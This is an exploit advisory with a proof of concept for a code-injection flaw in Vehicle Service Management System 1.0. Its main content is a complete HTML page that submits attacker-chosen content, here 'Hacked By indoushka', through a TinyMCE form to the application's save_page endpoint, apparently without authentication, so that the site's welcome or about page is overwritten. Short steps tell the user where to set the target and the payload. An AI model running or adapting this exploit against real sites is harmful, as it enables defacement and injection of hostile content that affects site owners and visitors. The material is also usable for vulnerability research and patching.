=============================================================================================================================================
| # Title     : Vehicle Service Management System 1.0 WYSIWYG code injection vulnerability                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php . 
   
[+] Line 86 :  Set your Target.

[+] Line 27 :  set your payload.  <textarea name="page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome Page Editor</title>
    <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
    <main id="main" class="main">
        <div class="pagetitle">
          <h1>Welcome Page</h1>
          <nav>
              <ol class="breadcrumb">
             
                <li class="breadcrumb-item active">Welcome Page</li>
              </ol>
          </nav>
        </div>

        <div id="msg-container"></div>
        
        <div class="card rounded-0">
          <div class="card-body rounded-0 pt-4">
            <div class="container-fluid">
              <form id="page-form">
                <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>
              </form>
            </div>
          </div>
          <div class="card-footer">
            <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">
              <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>
            </div>
          </div>
        </div>

        <div id="loader" style="display:none;">Loading...</div>
        <div id="toast"></div>

        <script>
            // Initialize TinyMCE
            tinymce.init({
                selector: 'textarea.tinymce-editor',
                height: 300,
                menubar: false,
                plugins: [
                  'advlist autolink lists link image charmap print preview anchor',
                  'searchreplace visualblocks code fullscreen',
                  'insertdatetime media table paste code help wordcount'
                ],
                toolbar: 'undo redo | formatselect | bold italic backcolor | ' +
                         'alignleft aligncenter alignright alignjustify | ' +
                         'bullist numlist outdent indent | removeformat | help'
            });

            // Loader functions
            function start_loader() {
                document.getElementById('loader').style.display = 'block';
            }

            function end_loader() {
                document.getElementById('loader').style.display = 'none';
            }

            // Toast function
            function showMessage(message, type) {
                const messageDiv = document.getElementById('toast');
                messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;
                setTimeout(() =>        {
                    messageDiv.innerHTML = '';
                }, 3000);
            }

            // Form submit event listener
            document.getElementById('page-form').addEventListener('submit', function(e) {
                e.preventDefault(); // Prevent page reload

                // Start loader
                start_loader();

                const formData = new FormData(this); // Get form data
                const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

                // Set up request
                xhr.open('POST', 'http://localhost/vservice/classes/Master.php?f=save_page', true);

                // Handle response
                xhr.onreadystatechange = function() {
                    if (xhr.readyState === XMLHttpRequest.DONE) {
                        end_loader();
                        if (xhr.status === 200) {
                            const response = JSON.parse(xhr.responseText);
                            if (response.status === 'success') {
                                showMessage('Page updated successfully!', 'success');
                                location.reload(); // Reload the page if successful
                            } else if (response.status === 'failed' && response.msg) {
                                showMessage(response.msg, 'error');
                            } else {
                                showMessage('An unknown error occurred.', 'error');
                            }
                        } else {
                            showMessage('Error: ' + xhr.statusText, 'error');
                        }
                    }
                };

                // Send the request
                xhr.send(formData);
            });
        </script>
    </main>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================